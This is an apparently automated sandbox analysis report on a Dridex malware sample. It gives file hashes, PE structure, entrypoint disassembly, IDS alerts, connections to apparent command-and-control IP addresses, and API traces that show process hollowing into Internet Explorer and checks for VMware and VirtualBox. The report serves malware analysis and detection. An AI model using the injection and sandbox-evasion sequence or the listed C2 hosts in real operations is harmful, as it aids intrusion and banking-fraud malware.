	SecuriteInfo.com.W32.AIDetect.malware1.13347.exe	Get hash	malicious	Browse	89.108.88.140
	SecuriteInfo.com.W32.AIDetect.malware1.8119.exe	Get hash	malicious	Browse	89.108.88.140
	seed.exe	Get hash	malicious	Browse	89.108.88.140
	SecuriteInfo.com.Heur.17834.xls	Get hash	malicious	Browse	89.108.122.188
	SecuriteInfo.com.Heur.9646.xls	Get hash	malicious	Browse	89.108.122.188
	SecuriteInfo.com.Heur.17834.xls	Get hash	malicious	Browse	89.108.122.188
	SecuriteInfo.com.Heur.9646.xls	Get hash	malicious	Browse	89.108.122.188
	Claim-2016732059-02092021.xls	Get hash	malicious	Browse	89.108.122.188
	Claim-2016732059-02092021.xls	Get hash	malicious	Browse	89.108.122.188
	Claim-1610138277-02092021.xls	Get hash	malicious	Browse	89.108.122.188

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.640683635227719
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Dridex.exe
File size:	176128
MD5:	6e5654da58c03df6808466f0197207ed
SHA1:	594f33ad9d7f85625a88c24903243ba9788fba86
SHA256:	e30b76f9454a5fd3d11b5792ff93e56c52bf5dfba6ab375c3b96e17af562f5fc
SHA512:	6542a42528f11085376ba893615cd7b68b37e1c78427c678db658e6174ca8d0ac893b071aa55e8d3924a6a2235657322eadf025f10e26c4a0c9858e3c12eb264
SSDEEP:	3072:qZkKstjomW1XBJqhhPQa77l79KQXF6yvf4FkbmB7VU2fMa+:zvUmgqkm9KQXF6yvwCbu7gT
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............B...B...B#..B...B)..Bj..B...B...Bj..B...B...B...BW..B9..B...B...B:..B...BW..Bi..BRich...B................PE..L...b.QV...

File Icon


Icon Hash:	c08c6665996135a7

Static PE Info

General
Entrypoint:	0x402410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5651A962 [Sun Nov 22 11:39:14 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3c0df6d8c78f9ce11bee326616d075a2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00403770h
push 00402612h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00403260h]
pop ecx
or dword ptr [00407128h], FFFFFFFFh
or dword ptr [0040712Ch], FFFFFFFFh
call dword ptr [00403264h]
mov ecx, dword ptr [0040711Ch]
mov dword ptr [eax], ecx
call dword ptr [00403268h]
mov ecx, dword ptr [00407118h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040326Ch]
mov eax, dword ptr [eax]
mov dword ptr [00407124h], eax
call 00007FF08CC89637h
cmp dword ptr [00406FD0h], ebx
jne 00007FF08CC894AEh
push 0040260Eh
call dword ptr [00403270h]
pop ecx
call 00007FF08CC89609h
push 00405028h
push 00405024h
call 00007FF08CC895F4h
mov eax, dword ptr [00407114h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00407110h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00403278h]
push 00405020h
push 00405000h
call 00007FF08CC895C1h

Rich Headers

Programming Language:

[C++] VS2002 (.NET) build 9466
[EXP] VC++ 6.0 SP5 build 8804
[ASM] VS2002 (.NET) build 9466

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1000	0x10	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3980	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x23e9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa000	0x22	.rsrc
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0x2f0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1850	0x2000	False	0.381591796875	data	4.8857712628	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x1148	0x2000	False	0.22705078125	data	3.18379463097	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x5000	0x2130	0x2000	False	0.441162109375	data	4.29630200062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x23e9c	0x24000	False	0.962103949653	data	7.93888068706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
MFC42.DLL
MSVCRT.dll	_controlfp, _onexit, __dllonexit, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, _setmbcp, __CxxFrameHandler, strtol, _exit, _XcptFilter, exit
KERNEL32.dll	FindNextFileW, GetTimeZoneInformation, ExitProcess, GetModuleFileNameA, FlushFileBuffers, SetStdHandle, HeapDestroy, FindFirstFileA, HeapReAlloc, GetDateFormatA, GetEnvironmentStrings, GetACP, GetCommandLineA, GetModuleHandleA, GetStartupInfoA, GetLocaleInfoW, CreateFileW, MapViewOfFile, GetOEMCP, CreateFileA, GetModuleFileNameW
USER32.dll	IsIconic, GetCaretBlinkTime, ShowWindow, UpdateWindow, GetCursorPos, PeekMessageW, RegisterClipboardFormatW, GetSystemMetrics, HideCaret, GetSystemMenu, AppendMenuA, SendMessageA, LoadIconA, MessageBoxIndirectA, GetDesktopWindow, DrawIcon, EnableWindow, GetClientRect
GDI32.dll	GetCharABCWidthsFloatA, CreateCompatibleDC
ADVAPI32.dll	RegDeleteKeyW
OLEAUT32.dll	VariantClear

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/20/21-09:53:56.512323	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.548392	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/20/21-09:53:56.548789	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.585493	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/20/21-09:53:56.585894	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.632458	ICMP	449	ICMP Time-To-Live Exceeded in Transit	81.95.2.138	192.168.2.6
04/20/21-09:53:56.634351	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.684778	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.6	192.168.2.6
04/20/21-09:53:56.686368	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.736294	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.13	192.168.2.6
04/20/21-09:53:56.736727	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/20/21-09:53:56.786580	ICMP	408	ICMP Echo Reply	205.185.216.42	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2021 09:54:01.980242968 CEST	49710	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:54:04.986002922 CEST	49710	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:54:10.986838102 CEST	49710	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:54:23.121998072 CEST	49722	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:54:23.347047091 CEST	4493	49722	103.252.100.44	192.168.2.6
Apr 20, 2021 09:54:23.846987009 CEST	49722	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:54:24.070667982 CEST	4493	49722	103.252.100.44	192.168.2.6
Apr 20, 2021 09:54:24.581424952 CEST	49722	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:54:24.804922104 CEST	4493	49722	103.252.100.44	192.168.2.6
Apr 20, 2021 09:54:24.930471897 CEST	49723	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:54:25.012185097 CEST	8843	49723	89.108.71.148	192.168.2.6
Apr 20, 2021 09:54:25.518956900 CEST	49723	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:54:25.599697113 CEST	8843	49723	89.108.71.148	192.168.2.6
Apr 20, 2021 09:54:26.112911940 CEST	49723	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:54:26.193877935 CEST	8843	49723	89.108.71.148	192.168.2.6
Apr 20, 2021 09:54:26.324467897 CEST	49725	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:54:29.331882954 CEST	49725	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:54:35.457282066 CEST	49725	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:54:47.732934952 CEST	49733	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:54:50.739876986 CEST	49733	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:54:56.755979061 CEST	49733	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:55:08.876112938 CEST	49747	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:09.102027893 CEST	4493	49747	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:09.616362095 CEST	49747	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:09.842179060 CEST	4493	49747	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:10.350907087 CEST	49747	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:10.578915119 CEST	4493	49747	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:10.706809998 CEST	49748	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:10.788043022 CEST	8843	49748	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:11.288642883 CEST	49748	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:11.369493008 CEST	8843	49748	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:11.882234097 CEST	49748	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:11.965500116 CEST	8843	49748	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:12.077649117 CEST	49749	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:55:15.070101976 CEST	49749	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:55:21.086074114 CEST	49749	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:55:33.201924086 CEST	49754	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:55:36.228055954 CEST	49754	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:55:42.230663061 CEST	49754	2448	192.168.2.6	94.73.155.12
Apr 20, 2021 09:55:54.352848053 CEST	49756	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:54.579914093 CEST	4493	49756	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:55.081360102 CEST	49756	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:55.309356928 CEST	4493	49756	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:55.815732002 CEST	49756	4493	192.168.2.6	103.252.100.44
Apr 20, 2021 09:55:56.043368101 CEST	4493	49756	103.252.100.44	192.168.2.6
Apr 20, 2021 09:55:56.162945986 CEST	49757	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:56.244903088 CEST	8843	49757	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:56.753408909 CEST	49757	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:56.836299896 CEST	8843	49757	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:57.347174883 CEST	49757	8843	192.168.2.6	89.108.71.148
Apr 20, 2021 09:55:57.432483912 CEST	8843	49757	89.108.71.148	192.168.2.6
Apr 20, 2021 09:55:57.555047035 CEST	49758	8843	192.168.2.6	221.132.35.56
Apr 20, 2021 09:56:00.566162109 CEST	49758	8843	192.168.2.6	221.132.35.56

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Dridex.exe PID: 6616 Parent PID: 5872

General

Start time:	09:53:56
Start date:	20/04/2021
Path:	C:\Users\user\Desktop\Dridex.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Dridex.exe'
Imagebase:	0x400000
File size:	176128 bytes
MD5 hash:	6E5654DA58C03DF6808466F0197207ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Dridex.exe PID: 6660 Parent PID: 6616

General

Start time:	09:53:58
Start date:	20/04/2021
Path:	C:\Users\user\Desktop\Dridex.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Dridex.exe
Imagebase:	0x400000
File size:	176128 bytes
MD5 hash:	6E5654DA58C03DF6808466F0197207ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Dridex.exe PID: 6616 Parent PID: 5872 Dridex.exeCOMMON

Executed Functions

Function 02370018, Relevance: 425.1, APIs: 36, Strings: 205, Instructions: 3345filenativeinjectionCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(psapi.dll,GetProcessMemoryInfo), ref: 0237201C
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 023726FA
GetThreadContext.KERNELBASE(?,?), ref: 0237271C
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 02372735
NtUnmapViewOfSection.NTDLL(?,?), ref: 02372744
NtUnmapViewOfSection.NTDLL(?,?), ref: 02372753
NtUnmapViewOfSection.NTDLL(?,?), ref: 02372774
NtUnmapViewOfSection.NTDLL(?,?), ref: 02372780
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 023727E5
VirtualAllocEx.KERNELBASE(?,?,00100000,00003000,00000040), ref: 02372813
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 02372839
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0237287A
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 023728D7
WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 02372904
SetThreadContext.KERNELBASE(?,00010007), ref: 02372920
ResumeThread.KERNELBASE(?), ref: 02372E05
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02372EEB
TerminateProcess.KERNELBASE(00000000), ref: 02372F11
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000002,00000000,00000000), ref: 0237305F
CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 0237307F
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0237309A
CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000005,00000000,00000000), ref: 023730B7
FindCloseChangeNotification.KERNELBASE(40000000), ref: 023730C9
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02373157
Process32First.KERNEL32(000000FF,00000128), ref: 023731BB
Process32Next.KERNEL32(000000FF,00000128), ref: 023731CF
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0237320A
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0237333B
CreateFileA.KERNELBASE(?,00000000,00000002,00000000,00000003,00000000,00000000), ref: 02373359
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023733A2
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023733D6
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02373464
VirtualAlloc.KERNELBASE(00000000,-000003F7,00003000,00000040), ref: 02373487
ReadFile.KERNELBASE(?,00000000,00000000), ref: 023734A3
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 023734FC
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 023735B9

Strings

/, xrefs: 02373A2D
c, xrefs: 02372166
t, xrefs: 02372582
n, xrefs: 02372158
l, xrefs: 02372135
Program Files (x86)\Internet Explorer\iexplore.exe, xrefs: 02372421, 0237242D
VirtualAllocEx, xrefs: 02371F18, 02371F1E
EqualSid, xrefs: 02371DE1, 02371DE7
s, xrefs: 023729A0
s, xrefs: 02372119
RegOpenKeyExW, xrefs: 02371C45, 02371C4B
IsWow64Process, xrefs: 02371FDB, 02371FE1
c, xrefs: 0237254D
s, xrefs: 02372569
i, xrefs: 02372953
d, xrefs: 02372F14
GetProcessMemoryInfo, xrefs: 0237200E, 02372014
n, xrefs: 02372B7C
WriteFile, xrefs: 02372035, 0237203B
Process32Next, xrefs: 02371E91, 02371E97
CreateFileW, xrefs: 02371B89, 02371B8F
RegQueryValueExA, xrefs: 02371C59, 02371C5F
5, xrefs: 02372648
v, xrefs: 0237260A
(, xrefs: 023728E4
>, xrefs: 023729D1
\, xrefs: 0237215F
CreateToolhelp32Snapshot, xrefs: 02371E65, 02371E6B
c, xrefs: 02373AC0
e, xrefs: 02372127
ResumeThread, xrefs: 02371F70, 02371F76
psapi.dll, xrefs: 02372015, 0237201B
LookupAccountSidA, xrefs: 02371DFB, 02371E01
CloseHandle, xrefs: 02371B36, 02371B3C
P, xrefs: 02372690
r, xrefs: 02372A02
System.ni.dll, xrefs: 02372D3C, 02372D42
s, xrefs: 02372687
S, xrefs: 02372E3B
t, xrefs: 02373A81
D, xrefs: 02372E4D
NtUnmapViewOfSection, xrefs: 02371EFF, 02371F05
.ofg, xrefs: 02372BE3, 02372BE9
i, xrefs: 0237253A
x, xrefs: 02373A04
UACMut, xrefs: 023737C7, 023737CA
C, xrefs: 02372675
_, xrefs: 02372E5F
7, xrefs: 0237266C
ReadFile, xrefs: 02371BAF, 02371BB5
Process32First, xrefs: 02371E7B, 02371E81
AllocateAndInitializeSid, xrefs: 02371DC7, 02371DCD
>, xrefs: 02372992
CreateMutexA, xrefs: 02371B5D, 02371B63
SHGetSpecialFolderPathW, xrefs: 02371C14, 02371C1A
t, xrefs: 023729BC
f, xrefs: 0237294C
t, xrefs: 02372104
SetFileAttributesW, xrefs: 02371BE8, 02371BEE
NtReadVirtualMemory, xrefs: 02371FC2, 02371FC8
a, xrefs: 0237267E
f, xrefs: 02372579
t, xrefs: 023720FD
GetSystemDirectoryA, xrefs: 02371BC2, 02371BC8
GetModuleFileNameW, xrefs: 02371B00, 02371B06
, xrefs: 02373A96
m, xrefs: 023725CF
<, xrefs: 02372999
h, xrefs: 02372120
WriteProcessMemory, xrefs: 02371F2E, 02371F34
r, xrefs: 023725F1
RegQueryValueExW, xrefs: 02371C70, 02371C76
s, xrefs: 02373AAB
_, xrefs: 0237343E
o, xrefs: 023729FB
x, xrefs: 023726B9
<, xrefs: 023729D8
o, xrefs: 0237216D
CreateFileA, xrefs: 02371B73, 02371B79
r, xrefs: 023725BD
a, xrefs: 0237296F
<, xrefs: 02372930
DuplicateHandle, xrefs: 02371FFE, 02372004
e, xrefs: 023726C2
TerminateProcess, xrefs: 02371F99, 02371F9F
GlobalAlloc, xrefs: 02371D82, 02371D88
u, xrefs: 023729C3
SuspendThread, xrefs: 02371F83, 02371F89
p, xrefs: 023729F4
_, xrefs: 023733BD
I, xrefs: 02373423
\SD_, xrefs: 02372E9A, 02372EA0
p, xrefs: 023729ED
, xrefs: 02373A73
T, xrefs: 023725A4
Module32Next, xrefs: 02371EBD, 02371EC3
L, xrefs: 02373435
v, xrefs: 02373AB9
RegSetValueExW, xrefs: 02371C98, 02371C9E
n, xrefs: 02372945
RegCloseKey, xrefs: 02371CAC, 02371CB2
advapi32.dll, xrefs: 02371C35, 02371C3B
t, xrefs: 02372976
u, xrefs: 02372961
kernel32.dll, xrefs: 02371AC3, 02371AC6
CreateProcessW, xrefs: 02371B26, 02371B2C
g, xrefs: 0237295A
S, xrefs: 02373AB2
CreateDirectoryW, xrefs: 02371CC6, 02371CCC
a, xrefs: 023725C6
e, xrefs: 02373A65
Module32First, xrefs: 02371EA7, 02371EAD
ExitProcess, xrefs: 02371D35, 02371D3B
2, xrefs: 02372613
2, xrefs: 02372663
M, xrefs: 02373A9D
\, xrefs: 02373883
n, xrefs: 0237298B
GetModuleFileNameA, xrefs: 02371AEA, 02371AF0
OpenProcessToken, xrefs: 02371D93, 02371D99
p, xrefs: 0237210B
GetCommandLineW, xrefs: 02372022, 02372028
GetProcAddress, xrefs: 02371ABB, 02371AC2
GetFileTime, xrefs: 02371CE9, 02371CEF
e, xrefs: 02372151
DeleteFileW, xrefs: 02371D1F, 02371D25
c, xrefs: 02372937
p, xrefs: 02373A8F
d, xrefs: 02372190
0, xrefs: 02372638
SetThreadContext, xrefs: 02371F5A, 02371F60
x, xrefs: 023738F5
\, xrefs: 02372112
GetCurrentProcess, xrefs: 02371D71, 02371D77
m, xrefs: 0237217B
0, xrefs: 02372651
p, xrefs: 02373AA4
RegSetValueExA, xrefs: 02371C84, 02371C8A
L, xrefs: 02372E56
VirtualAlloc, xrefs: 02371D45, 02371D4B
h, xrefs: 023720E3
l, xrefs: 0237212E
x, xrefs: 023724EB
GetTickCount, xrefs: 02371D5B, 02371D61
ntdll.dll, xrefs: 02371F06, 02371F0C
vmtoolsd.exe, xrefs: 023731F6, 023731F9
\, xrefs: 0237213C
OpenProcess, xrefs: 02371FEE, 02371FF4
', xrefs: 023735FE
, xrefs: 02373A57
E, xrefs: 0237259B
GetThreadContext, xrefs: 02371F44, 02371F4A
GetSystemDirectoryW, xrefs: 02371BD8, 02371BDE
s, xrefs: 02373A7A
MoveFileExW, xrefs: 02371BFE, 02371C04
e, xrefs: 023725D8
OpenMutexA, xrefs: 02371B47, 02371B4D
Sleep, xrefs: 02371CD6, 02371CDC
c, xrefs: 02373A50
7, xrefs: 0237265A
t, xrefs: 02373A6C
s, xrefs: 02373894
o, xrefs: 02372143
w, xrefs: 023725E1
e, xrefs: 02373A08
o, xrefs: 02372984
F, xrefs: 023725B4
e, xrefs: 023726B0
X, xrefs: 02372E68
5, xrefs: 023735F7
shell32.dll, xrefs: 02371C1B, 02371C21
m, xrefs: 02372174
r, xrefs: 023729B5
>, xrefs: 02372B83
n, xrefs: 02373A5E
r, xrefs: 02372968
SetFileTime, xrefs: 02371CF9, 02371CFF
", xrefs: 02372216
p, xrefs: 023729CA
S, xrefs: 0237341A
CreateProcessA, xrefs: 02371B16, 02371B1C
CopyFileW, xrefs: 02371D09, 02371D0F
GetFileSize, xrefs: 02371B9C, 02371BA2
RegOpenKeyExA, xrefs: 02371C2E, 02371C34
t, xrefs: 023729A7
i, xrefs: 0237297D
a, xrefs: 02372182
D, xrefs: 0237342C
VBoxService.exe, xrefs: 023731E0, 023731E3
l, xrefs: 023726A0
s, xrefs: 023729DF
u, xrefs: 023729E6
o, xrefs: 02373A88
a, xrefs: 023729AE
k, xrefs: 023725FA
N, xrefs: 02372592
I, xrefs: 02372E44
t, xrefs: 02372A09
M, xrefs: 02372530
r, xrefs: 02372558
o, xrefs: 0237293E
n, xrefs: 02372189
GetTokenInformation, xrefs: 02371DAD, 02371DB3
GetModuleHandleA, xrefs: 02371AD3, 02371AD9
p, xrefs: 0237214A

Memory Dump Source

Source File: 00000000.00000002.333656848.0000000002370000.00000040.00000001.sdmp, Offset: 02370000, based on PE: false

Similarity

API ID: Create$File$Process$MemoryVirtual$AllocSectionUnmapViewWrite$ChangeCloseFindNotificationThread$ContextProcess32Read$FirstLibraryLoadNextResumeSnapshotTerminateToolhelp32
String ID: $ $ $"$'$($.ofg$/$0$0$2$2$5$5$7$7$<$<$<$>$>$>$AllocateAndInitializeSid$C$CloseHandle$CopyFileW$CreateDirectoryW$CreateFileA$CreateFileW$CreateMutexA$CreateProcessA$CreateProcessW$CreateToolhelp32Snapshot$D$D$DeleteFileW$DuplicateHandle$E$EqualSid$ExitProcess$F$GetCommandLineW$GetCurrentProcess$GetFileSize$GetFileTime$GetModuleFileNameA$GetModuleFileNameW$GetModuleHandleA$GetProcAddress$GetProcessMemoryInfo$GetSystemDirectoryA$GetSystemDirectoryW$GetThreadContext$GetTickCount$GetTokenInformation$GlobalAlloc$I$I$IsWow64Process$L$L$LookupAccountSidA$M$M$Module32First$Module32Next$MoveFileExW$N$NtReadVirtualMemory$NtUnmapViewOfSection$OpenMutexA$OpenProcess$OpenProcessToken$P$Process32First$Process32Next$Program Files (x86)\Internet Explorer\iexplore.exe$ReadFile$RegCloseKey$RegOpenKeyExA$RegOpenKeyExW$RegQueryValueExA$RegQueryValueExW$RegSetValueExA$RegSetValueExW$ResumeThread$S$S$S$SHGetSpecialFolderPathW$SetFileAttributesW$SetFileTime$SetThreadContext$Sleep$SuspendThread$System.ni.dll$T$TerminateProcess$UACMut$VBoxService.exe$VirtualAlloc$VirtualAllocEx$WriteFile$WriteProcessMemory$X$\$\$\$\$\SD_$_$_$_$a$a$a$a$a$advapi32.dll$c$c$c$c$c$d$d$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$k$kernel32.dll$l$l$l$m$m$m$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$p$p$p$p$p$p$p$psapi.dll$r$r$r$r$r$r$s$s$s$s$s$s$s$s$shell32.dll$t$t$t$t$t$t$t$t$t$u$u$u$v$v$vmtoolsd.exe$w$x$x$x$x
API String ID: 4111043871-3324414064
Opcode ID: 1585ecd3ea26a12c16edd39c8d3e235753ff999a28be0f02d076e5741ad70579
Instruction ID: 750962d519b66b3f5dd1b163bf16eb5787279d0e79d5e475cac999297762e93a
Opcode Fuzzy Hash: 1585ecd3ea26a12c16edd39c8d3e235753ff999a28be0f02d076e5741ad70579
Instruction Fuzzy Hash: FC83DD61C086ECD9EF22C664CC487DEBFB95F16709F0440D9D18C66282C7BA5B98CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00401820, Relevance: 24.2, APIs: 16, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

#4710.MFC42(?,?,?,?,00402778,000000FF), ref: 00401851
GetSystemMenu.USER32(?,00000000,?,?,?,?,00402778,000000FF), ref: 00401862
#2863.MFC42(00000000,?,?,?,?,00402778,000000FF), ref: 00401869
#540.MFC42 ref: 00401887
#4160.MFC42(00000065), ref: 0040189B
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004018C6
AppendMenuA.USER32(?,00000000,00000010,?), ref: 004018ED
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040192C
CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00401948
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401995
SendMessageA.USER32(?,00000080,00000000,?), ref: 004019D1
#922.MFC42(?,00407100,004070FC,004070F8,004070F4), ref: 004019F7
#922.MFC42(?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A23
#922.MFC42(?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A4C
#6877.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A7F
#540.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401ADF

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: #922Menu$#540AppendFileMessageSend$#2863#4160#4710#6877CreateModuleNameSystem
String ID:
API String ID: 96702024-0
Opcode ID: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
